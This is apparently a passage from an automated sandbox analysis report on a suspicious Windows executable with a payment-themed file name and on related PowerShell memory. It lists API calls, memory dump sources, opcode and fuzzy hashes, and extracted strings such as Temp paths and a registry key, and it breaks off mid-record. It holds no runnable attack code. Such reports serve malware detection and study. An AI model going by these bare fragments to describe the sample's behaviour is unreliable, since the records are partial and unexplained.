                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: lstrlen
                            • String ID: C:\Users\user\AppData\Local\Temp\nso1577.tmp$Software\nekton\plastrendes
                            • API String ID: 1659193697-3569989899
                            • Opcode ID: 7a05d24eb738911f387c4cc48268cee578f337ee67ae4b8f05bf6e5f5feafd27
                            • Instruction ID: 065fa95b7f6ceba1475350b2e5fd0629383d1058fb688f50996a10954fc95768
                            • Opcode Fuzzy Hash: 7a05d24eb738911f387c4cc48268cee578f337ee67ae4b8f05bf6e5f5feafd27
                            • Instruction Fuzzy Hash: D011E772B00305BBCB10BBB18E4AE9E76B0AF40749F21443FF002B62C1D6FD8891965E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • DestroyWindow.USER32(00000000,00000000,004031F7,00000001,?,?,?,?,?,00403847,?), ref: 0040302C
                            • GetTickCount.KERNEL32 ref: 0040304A
                            • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 00403067
                            • ShowWindow.USER32(00000000,00000005,?,?,?,?,?,00403847,?), ref: 00403075
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Window$CountCreateDestroyDialogParamShowTick
                            • String ID:
                            • API String ID: 2102729457-0
                            • Opcode ID: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                            • Instruction ID: a5ec5a94053ed6ec85071f05b03f47ec4a0cd54214f56ca0ac695578935c79f2
                            • Opcode Fuzzy Hash: 9e4f0c6fd4882656516298184c032d47dc92d32e43a921afdb36728f0eb821a0
                            • Instruction Fuzzy Hash: 44F05430603620EBC2316F10FD0898B7B69FB04B43B424C7AF041B11A9CB7609828B9C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • IsWindowVisible.USER32(?), ref: 0040550C
                            • CallWindowProcW.USER32(?,?,?,?), ref: 0040555D
                              • Part of subcall function 004044AF: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Window$CallMessageProcSendVisible
                            • String ID:
                            • API String ID: 3748168415-3916222277
                            • Opcode ID: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                            • Instruction ID: 896dd7550c11452a1c115f53988c63f353f89721b9370a05553ad38a214c3fb8
                            • Opcode Fuzzy Hash: 97a082d88a1cb55e03e66ec7543f709465f1e5e5e36f808a355b04b1bc4c309f
                            • Instruction Fuzzy Hash: 1601B171200609BFDF219F11DC81A6B3A27FB84354F100036FA01762D5C77A8E52DE5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403AF9,00403A28,?), ref: 00403B3B
                            • GlobalFree.KERNEL32(?), ref: 00403B42
                            Strings
                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B21
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: Free$GlobalLibrary
                            • String ID: C:\Users\user\AppData\Local\Temp\
                            • API String ID: 1100898210-3081826266
                            • Opcode ID: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                            • Instruction ID: 69a7d7bec05ee7f0f22c4a872385324a298b9ba4725761c8be5e054fe1390d88
                            • Opcode Fuzzy Hash: 942278ec9c7e8339a206e332dc723704b636a129dd5b4a9861660f1353137a24
                            • Instruction Fuzzy Hash: 25E0EC3750116097C6215F45EA08B5EBBB9AF54B26F09013AE9807B27187746C428B98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405E28
                            • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,004030E9,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003), ref: 00405E38
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: CharPrevlstrlen
                            • String ID: C:\Users\user\Desktop
                            • API String ID: 2709904686-224404859
                            • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                            • Instruction ID: b9880c769af8d41d832fb6ed8dc33ce50b4fd52cea508e3b62d11b70b6cf9f92
                            • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                            • Instruction Fuzzy Hash: 98D0A7B3410D20AEC3126B04EC04D9F73ACFF5130078A4427F581A71A4D7785D818EEC
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
                            • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405F84
                            • CharNextA.USER32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F95
                            • lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd
                            Similarity
                            • API ID: lstrlen$CharNextlstrcmpi
                            • String ID:
                            • API String ID: 190613189-0
                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction ID: 4f09c4eeff833ffafa08c7ff84761216a5ad6e9a06c03d1ebffd7ec4ed62f0c5
                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                            • Instruction Fuzzy Hash: 53F06231505818FFD7029FA5DD04D9EBBA8EF06254B2540AAE940F7250D678DE019BA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 45883f34ab4357ab66eb3a9d1f4be69fa7ae47ea9dbf0e689f366ec85983d186
                            • Instruction ID: 48b86da692197d72b77656b6ceab3f2a4260eb2b78646ebd1b1507b8a3b26122
                            • Opcode Fuzzy Hash: 45883f34ab4357ab66eb3a9d1f4be69fa7ae47ea9dbf0e689f366ec85983d186
                            • Instruction Fuzzy Hash: C2B18F71E002098FDF51CFA8D9857EDBBF6BF88314F24852AD815E7694EB349846CB81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-8296021
                            • Opcode ID: 590b5794c9b39efa76b181e16d7ec5d91ef80d4d6db1dcce2f11eb8c020d9494
                            • Instruction ID: 645af89e4e01e56de4a40a3ea2d79b8ae7a29e2479888bfde504076ff962e0af
                            • Opcode Fuzzy Hash: 590b5794c9b39efa76b181e16d7ec5d91ef80d4d6db1dcce2f11eb8c020d9494
                            • Instruction Fuzzy Hash: AF3257F1B1030A8FEB65AB78C8006AABBE5AF85210F1484EBD449CF751DB31C945C7B1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                            • API String ID: 0-2338339476
                            • Opcode ID: 74e49236d59e8fb692eeb9925ac4fb8d08f85060d82071a1b3d098408f56a89e
                            • Instruction ID: e24f16d493cf5a52a46e6bb8fdc2c5879c4847f960f29a0d5f0f6a707df46388
                            • Opcode Fuzzy Hash: 74e49236d59e8fb692eeb9925ac4fb8d08f85060d82071a1b3d098408f56a89e
                            • Instruction Fuzzy Hash: 0692A2B1B003099FEB54EF69C854A6ABBF2BF85310F14C46AE8099B755CB31DC46CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q$U$tP^q$tP^q
                            • API String ID: 0-653905586
                            • Opcode ID: 3e33b410056e117448f7245835d5e3e6540b1d4e36d6fabe3924e1e165752e9d
                            • Instruction ID: 3c3c4d59eecf2781d7050bf5ad6f2788f8ea79c476cd4c0f11ed5b332a5e7ae6
                            • Opcode Fuzzy Hash: 3e33b410056e117448f7245835d5e3e6540b1d4e36d6fabe3924e1e165752e9d
                            • Instruction Fuzzy Hash: D772C1B0B003159FEB64EB68C840B6EBBB2AF85710F14C5A9D8099F795CB32DD45CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$$^q$$^q$$^q
                            • API String ID: 0-3272787073
                            • Opcode ID: 13fd047d19f323e60b5e2a600061e4737bc593bbc32dfb1afce49e95cd9c6be9
                            • Instruction ID: 9606948cacd39bd92d55f1c3a60cb60af02b17d583aa347498cbf5499dd5c980
                            • Opcode Fuzzy Hash: 13fd047d19f323e60b5e2a600061e4737bc593bbc32dfb1afce49e95cd9c6be9
                            • Instruction Fuzzy Hash: 271268B1B043068FE759AB79C81076ABBE6AFC6210F1484AAD448CF352CA35C849C7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: tP^q$tP^q$tP^q$tP^q
                            • API String ID: 0-91886675
                            • Opcode ID: 145ed52f640e062298f127b186f7aa4d4af17b1b4c3477a110cae10fd6dcf7d6
                            • Instruction ID: 8979002faaecdbd6e814920de9a7b018624a8df225319df21467cc11e3569340
                            • Opcode Fuzzy Hash: 145ed52f640e062298f127b186f7aa4d4af17b1b4c3477a110cae10fd6dcf7d6
                            • Instruction Fuzzy Hash: 29E138B1B103059FD715AF68C401A6ABBE6AFC9310F24C46AE8499F3D1DB31DC45CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q$4'^q$4'^q
                            • API String ID: 0-1420252700
                            • Opcode ID: 52629e4070646a085214c7c5eba614b5e6af38f3773e3672682c06d2f9cf096b
                            • Instruction ID: b9deedf3f16152082414d93eaa7c721a8b271c7b020b6f3d070612c374e1d0c2
                            • Opcode Fuzzy Hash: 52629e4070646a085214c7c5eba614b5e6af38f3773e3672682c06d2f9cf096b
                            • Instruction Fuzzy Hash: DDE1BEB0B502099FEB14EBA9C451B9EBBB2AFC8304F14C469D4096F795CB35EC458F91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_69e0000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: Hbq$$^q$$^q
                            • API String ID: 0-1611274095
                            • Opcode ID: e7c5d781d1dacd3d7369a31ae0a82c52e60a806ea95f71244d33d9d00895ffc2
                            • Instruction ID: 3376eae5838e1cd2e428796a7870155c42849ea7660bd7811017455f92e4f313
                            • Opcode Fuzzy Hash: e7c5d781d1dacd3d7369a31ae0a82c52e60a806ea95f71244d33d9d00895ffc2
                            • Instruction Fuzzy Hash: 09223C30B00218CFCB65DB24C994AAEBBF6BF89304F1084A9D449AB755DF359E85CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q$$^q
                            • API String ID: 0-831282457
                            • Opcode ID: ba6838e06ff5f53b688a0293b52cce01b224b55536907f061b187e4cbafd6ee1
                            • Instruction ID: adf8ba5b9a123b3dcb990c6098d869cac1074ad9ce54ed4ca81771f7bed83555
                            • Opcode Fuzzy Hash: ba6838e06ff5f53b688a0293b52cce01b224b55536907f061b187e4cbafd6ee1
                            • Instruction Fuzzy Hash: 87216BF171030E5BFBA465AE9C00B67A6DAABC1710F248A3ED40ECB785DD35C8468361
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q
                            • API String ID: 0-2697143702
                            • Opcode ID: 4d74ae1c930b5bc494973491647406db3d96aae4da8893d57077755fac44c3f0
                            • Instruction ID: 8ae655a88b26bc4f349feeb4d54fe6d8f88fa3e0ff21063fd35016c8733fe206
                            • Opcode Fuzzy Hash: 4d74ae1c930b5bc494973491647406db3d96aae4da8893d57077755fac44c3f0
                            • Instruction Fuzzy Hash: 5B0290B0B00214DFD754DB58CC95FAABBA2AF85304F108099E9096F792CB76ED85CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q$4'^q
                            • API String ID: 0-2697143702
                            • Opcode ID: 29aa94b30ebb6a13b93e6cb895872886c291989abfc9dc548acd34df7a1d3253
                            • Instruction ID: 86ba87af5abd3b9d444ef300784699ce25d0de4e4b8f183671476e50db9436ea
                            • Opcode Fuzzy Hash: 29aa94b30ebb6a13b93e6cb895872886c291989abfc9dc548acd34df7a1d3253
                            • Instruction Fuzzy Hash: 06C1ADB0A003059FEB15EBA8C491F9EBBB2AF89304F14C569E4096F795CB35E845CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: Pi$Pi
                            • API String ID: 0-50544026
                            • Opcode ID: 58895fdc0fa00dca5920528003ffc320aac3c98c67bcc5bf603b17ae866016dd
                            • Instruction ID: 698680afe82324db463a061ba9706719a57182870d3ef8402b23de06e72ff26f
                            • Opcode Fuzzy Hash: 58895fdc0fa00dca5920528003ffc320aac3c98c67bcc5bf603b17ae866016dd
                            • Instruction Fuzzy Hash: 51917DB0B10208DFEB54DF99C451AAABBF2AF8D314F14C069D809AB795CB72DC41CB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: $^q$$^q
                            • API String ID: 0-355816377
                            • Opcode ID: ba7f69eb0a4b41e718280c26c04f1c937f1a3370eab078cef31851afbec3df86
                            • Instruction ID: 2e150d7044e64387049d2b2c77a52294ae60fd35adab9ede170f33f8a47aaa92
                            • Opcode Fuzzy Hash: ba7f69eb0a4b41e718280c26c04f1c937f1a3370eab078cef31851afbec3df86
                            • Instruction Fuzzy Hash: 3F216BF160838D2BFB6256798C107A27FA55F83610F18469FD98DCF683D578C949C362
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q
                            • API String ID: 0-1614139903
                            • Opcode ID: 576136bb2bc9670c022c864bbe74119dc620d8cca4def105994b803b6ee01d23
                            • Instruction ID: 0d2856cbb732a9f7e89c7ab32adc095aa9c4af73289a6bfe18699b86875ffe10
                            • Opcode Fuzzy Hash: 576136bb2bc9670c022c864bbe74119dc620d8cca4def105994b803b6ee01d23
                            • Instruction Fuzzy Hash: 2D329DB0B002169FE764DF58C841F6ABBA2BF84304F15C599D9089B796CB32ED85CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q
                            • API String ID: 0-1614139903
                            • Opcode ID: 3bd568313d066a419e76823914ea8368ea58db70622d3a946c5c9e6d47f267f6
                            • Instruction ID: aab253a63709dd8d12ac5a4c2b7f3b2ff849b27c325321defd5635aaa71f5c77
                            • Opcode Fuzzy Hash: 3bd568313d066a419e76823914ea8368ea58db70622d3a946c5c9e6d47f267f6
                            • Instruction Fuzzy Hash: FE327BB0A00216DFEB64DF58C841F6ABBB2BB84304F15C599D908AB756CB72ED45CF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q
                            • API String ID: 0-1614139903
                            • Opcode ID: d7f8214efe27df4d5cef93b7814966719634f9b120bd3c399b52168e1f72baa9
                            • Instruction ID: 630ea7ce6ad495de496030e89129728b56290da76fdada0c580275a967e34bb8
                            • Opcode Fuzzy Hash: d7f8214efe27df4d5cef93b7814966719634f9b120bd3c399b52168e1f72baa9
                            • Instruction Fuzzy Hash: 10326DB0B00214DFD754DB58CC95FAABBA2AB85304F10C099E9096F796CB72ED85CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q
                            • API String ID: 0-1614139903
                            • Opcode ID: 78316f2d8bcf516ecd921a6c34fec9851d10445e9b9b46bae82c8736ba545957
                            • Instruction ID: 6aaf9e44c4d651f4ee9cbff9cfc1e42109848d2f14a6d42e1acff8d2b1056a2e
                            • Opcode Fuzzy Hash: 78316f2d8bcf516ecd921a6c34fec9851d10445e9b9b46bae82c8736ba545957
                            • Instruction Fuzzy Hash: 30028CB0B002159FDB60DB68C841F5ABBA2BF84304F15C599E9086B796CB72ED85CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2597542038.0000000007380000.00000040.00000800.00020000.00000000.sdmp, Offset: 07380000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7380000_powershell.jbxd
                            Similarity
                            • API ID:
                            • String ID: 4'^q
                            • API String ID: 0-1614139903
                            • Opcode ID: 5db1f5fe3290a9182c6a3c347b77d5296a7ebc68ab1c7a022c04b1df2a258c62
                            • Instruction ID: 148d4aab25288e9432211ebb7f273205baafdf936a502f345436a49e97dd8635
                            • Opcode Fuzzy Hash: 5db1f5fe3290a9182c6a3c347b77d5296a7ebc68ab1c7a022c04b1df2a258c62
                            • Instruction Fuzzy Hash: 50028EB0B00214DFD754DB58CC95FAABBA2AB85304F108099E9096F792CB76ED85CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2596269291.00000000069E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069E0000, based on PE: false
                            Joe Sandbox IDA Plugin
